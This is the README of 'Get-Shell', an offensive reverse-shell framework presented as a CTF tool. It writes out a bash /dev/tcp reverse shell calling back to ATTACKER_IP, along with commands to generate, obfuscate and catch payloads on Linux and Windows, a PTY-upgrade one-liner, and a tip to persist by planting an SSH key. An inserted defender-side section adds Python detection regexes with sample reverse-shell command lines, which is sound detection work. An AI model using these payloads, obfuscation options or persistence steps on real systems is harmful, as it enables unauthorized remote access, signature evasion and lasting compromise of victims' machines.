sedat4ras/Get-Shell

   ____      _      ____  _          _ _
  / ___| ___| |_   / ___|| |__   ___| | |
 | |  _ / _ \ __|  \___ \| '_ \ / _ \ | |
 | |_| |  __/ |_    ___) | | | |  __/ | |
  \____|\___|\__|  |____/|_| |_|\___|_|_|

The Ultimate CTF Reverse Shell Framework


How It Works

┌─────────────────────────────────────────────────────────────────┐
│                     ATTACKER MACHINE                            │
│                                                                 │
│  python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen │
│                                                                 │
│  [1] Generates payload ──► copies to clipboard                 │
│  [2] Starts listener   ──► waits on 0.0.0.0:4444               │
└───────────────────────────────┬─────────────────────────────────┘
                                │
                   You inject the payload via RCE:
                   (command injection / web shell /
                    file upload / SQL shell / ...)
                                │
                                ▼
┌───────────────────────────────────────────────────────────────┐
│                      VICTIM MACHINE                           │
│                                                               │
│  bash -c 'xY3k=/bin/bash;                                    │
│            exec 3<>/dev/tcp/ATTACKER_IP/4444;                 │
│            $xY3k -i <&3 >&3 2>&3'                            │
│                                                               │
│  Victim CALLS BACK ──────────────────────────────────────►   │
└───────────────────────────────────────────────────────────────┘
                                │
                                ▼
        ┌────────────────────────────────┐
        │  [+] Connection from x.x.x.x  │
        │  [*] PTY upgrade sent          │
        │  kali@victim:~$ whoami         │
        │  kali                          │  ← Shell dropped!
        └────────────────────────────────┘

Demo

Reverse Shell Demo

Get-Shell generating a bash_tcp payload and catching the reverse shell

Root Shell

Privilege escalation to root after gaining initial access


Features

| Feature | Description |
|---|---|
| Plugin-based architecture | Drop a .py file in payloads/<os>/ — auto-discovered at runtime |
| Auto IP detection | -i tun0 resolves VPN interface IP without manual lookups |
| Variable randomization | Every payload generation uses unique random identifiers |
| Junk code injection | --obfuscate flag alters the byte signature per run |
| Integrated PTY listener | Built-in multi-threaded listener replaces nc -lvnp |
| Auto PTY upgrade | --upgrade sends pty.spawn automatically on connect |
| One-shot workflow | --listen chains generation and listening into a single command |
| Clipboard copy | --copy pushes the payload straight to your clipboard |
| Graceful fallbacks | colorama, pyperclip, psutil are optional — tool never crashes |
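
Seen from the defender's side, as an added example that is not part of Get-Shell: variable randomization changes identifiers such as xY3k on every run, but the bash_tcp payload in the How It Works diagram still has to redirect to /dev/tcp/<host>/<port> and attach stdin, stdout and stderr to one descriptor, so process command-line telemetry can be matched on that structure. The sample command lines, the rule names and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Constructed process command lines, as they might appear in auditd EXECVE
# records or EDR process telemetry. 192.0.2.10 is a documentation address.
SAMPLES = [
    "bash -c 'xY3k=/bin/bash; exec 3<>/dev/tcp/192.0.2.10/4444; $xY3k -i <&3 >&3 2>&3'",
    "bash -c 'qP9z=/bin/bash; exec 3<>/dev/tcp/192.0.2.10/4444; $qP9z -i <&3 >&3 2>&3'",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "bash -c 'tar czf /tmp/backup.tgz /etc'",
    "curl -s https://example.com/dev/tcp/readme",
]

# Hypothetical rule names; each regex keys on structure, not identifiers.
RULES = {
    # A redirection operator pointing at bash's /dev/tcp pseudo-device.
    "bash_dev_tcp_redirect": re.compile(r"""[<>]\s*/dev/tcp/[^/\s;'"]+/\d{1,5}\b"""),
    # stdin, stdout and stderr all duplicated onto the same numbered fd.
    "stdio_dup_to_one_fd": re.compile(r"<&(\d+)\s+>&\1\s+2>&\1"),
    # The PTY upgrade one-liner sent after a connection is caught.
    "pty_spawn_upgrade": re.compile(r"""pty\.spawn\(\s*["'][^"']*sh["']\s*\)"""),
}

def match_rules(cmdline):
    """Return the sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(cmdlines):
    """Map each suspicious command line to the rules it matched."""
    hits = {}
    for cmd in cmdlines:
        fired = match_rules(cmd)
        if fired:
            hits[cmd] = fired
    return hits

if __name__ == "__main__":
    for cmd, fired in triage(SAMPLES).items():
        print(f"{', '.join(fired):45} {cmd}")
```

The two bash samples differ only in the randomized variable name and produce identical rule hits, while the URL that merely contains /dev/tcp/ is not flagged because no redirection operator precedes it.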

Installation

git clone https://github.com/YOUR_USERNAME/Get-Shell.git
cd Get-Shell

# All dependencies are optional — install only what you need
pip install -r requirements.txt

| Package | Purpose | Required? |
|---|---|---|
| colorama | Coloured terminal output | No (plain text fallback) |
| pyperclip | --copy flag | No (manual copy fallback) |
| psutil | -i <iface> IP resolution | No (use --lip instead) |

Quick Start

# 1. List available payloads
python getshell.py list

# 2. Generate a payload + start listener in ONE command
python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen --upgrade --copy

# 3. Paste the copied payload on the victim → shell drops to you

Usage Reference

list — Browse Payloads

python getshell.py list [--os linux|windows] [--category terminal|web|...]
  bash_tcp               [linux  /terminal  ]  Pure-bash /dev/tcp reverse shell.
  python_pty             [linux  /terminal  ]  Python3 PTY reverse shell.
  powershell_obfuscated  [windows/terminal  ]  PowerShell TCP shell with random vars.

gen — Generate a Payload

python getshell.py gen <name> --lport <port>
                              [--lip <ip>]
                              [-i <iface> | --auto-ip]
                              [--obfuscate]
                              [--copy]
                              [--listen [--upgrade] [--lhost <bind>]]

| Flag | Description |
|---|---|
| name | Payload name from list |
| --lport | Your listener port (required) |
| --lip | Your listener IP (auto-detected if omitted) |
| -i / --iface | Interface name for IP resolution (e.g. tun0) |
| --obfuscate | Inject junk code + randomize variable names |
| --copy | Copy rendered payload to clipboard |
| --listen | Start listener after generating |
| --upgrade | With --listen: send PTY upgrade on connect |
| --lhost | With --listen: bind address (default 0.0.0.0) |

Examples:

# HackTheBox / TryHackMe (VPN interface)
python getshell.py gen bash_tcp -i tun0 --lport 4444 --listen --upgrade --copy

# Manual IP + obfuscation
python getshell.py gen python_pty --lip 10.10.14.5 --lport 9001 --obfuscate

# Windows target
python getshell.py gen powershell_obfuscated -i tun0 --lport 443 --copy

listen — Standalone Listener

python getshell.py listen --lport <port> [--lhost <bind>] [--upgrade]
python getshell.py listen --lport 4444
python getshell.py listen --lport 4444 --upgrade

ifaces — Enumerate Interfaces

python getshell.py ifaces

Lists all local network interfaces and their IPv4 addresses. Use this to find the correct interface name for the -i flag.


Supported Payloads

| Name | OS | Category | Description |
|---|---|---|---|
| bash_tcp | Linux | terminal | Pure-bash /dev/tcp — no external binaries |
| python_pty | Linux | terminal | Python3 with PTY spawn — interactive immediately |
| powershell_obfuscated | Windows | terminal | PowerShell TCP with randomized variable names |

Adding your own? → See CONTRIBUTING.md


Adding Custom Payloads

Get-Shell uses importlib to auto-discover payload plugins. No core code changes needed.

# 1. Copy the boilerplate
cp payloads/sample_payload.py.example payloads/linux/my_shell.py

# 2. Fill in metadata + template

# 3. Verify it loads
python getshell.py list
python getshell.py gen my_shell --lport 4444

Full documentation → CONTRIBUTING.md


Post-Exploitation Tips

After catching a shell, run these to improve interactivity:

# Upgrade to PTY (on victim)
python3 -c 'import pty; pty.spawn("/bin/bash")'

# On attacker — background with Ctrl+Z, then:
stty raw -echo; fg

# Set terminal dimensions
export TERM=xterm-256color
stty rows 50 cols 200

# Stable alternative channel
# Drop your SSH key to ~/.ssh/authorized_keys

Project Structure

Get-Shell/
├── getshell.py              # CLI entry point (argparse subcommands)
├── requirements.txt
├── core/
│   ├── loader.py            # Plugin discovery via importlib
│   ├── obfuscator.py        # random_var() + inject_junk()
│   ├── network.py           # Interface IP resolution
│   ├── ui.py                # colorama wrapper + clipboard
│   └── tips.py              # Post-exploitation tip bank
├── payloads/
│   ├── base.py              # Payload base class (plugin contract)
│   ├── sample_payload.py.example   # Boilerplate for new plugins
│   ├── linux/
│   │   ├── bash_tcp.py
│   │   └── python_pty.py
│   └── windows/
│       └── powershell_obfuscated.py
└── listeners/
    └── tcp_listener.py      # Multi-threaded socket listener

Contributing

Contributions are welcome — new payload templates especially!


License

MIT — use it, break things (ethically), share improvements.

Disclaimer: This tool is intended for authorized penetration testing, CTF competitions, and security research. Unauthorized use against systems you do not own or have explicit permission to test is illegal.


Built for the CTF community · Want to add a payload? See CONTRIBUTING.md
